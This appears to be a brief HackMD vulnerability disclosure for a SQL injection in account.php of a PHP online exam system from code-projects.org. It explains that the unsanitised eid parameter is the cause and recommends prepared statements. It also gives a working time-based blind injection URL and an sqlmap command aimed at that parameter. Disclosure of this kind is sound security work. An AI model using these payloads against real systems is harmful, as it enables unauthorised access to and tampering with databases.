HackMD
code-projects online-exam-mastering-system-php has sql injection in account.php
supplier
https://code-projects.org/online-exam-mastering-system-php/
describe
In account.php,
Code analysis
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
The SQL Injection vulnerability here exists because the value of $_GET['eid'] is directly embedded into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the eid parameter, it will be executed by the database. For example, if eid is set to '1' OR '1'='1', it could manipulate the query to return or modify unintended data. Always use prepared statements or parameterized queries to prevent this.
payload
http://host/account.php?q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 9913 FROM (SELECT(SLEEP(5)))emka) AND 'nnHe'='nnHe&n=1&t=5
exploit
use sqlmap to attack
sqlmap -u "/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5" -p eid --batch"
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
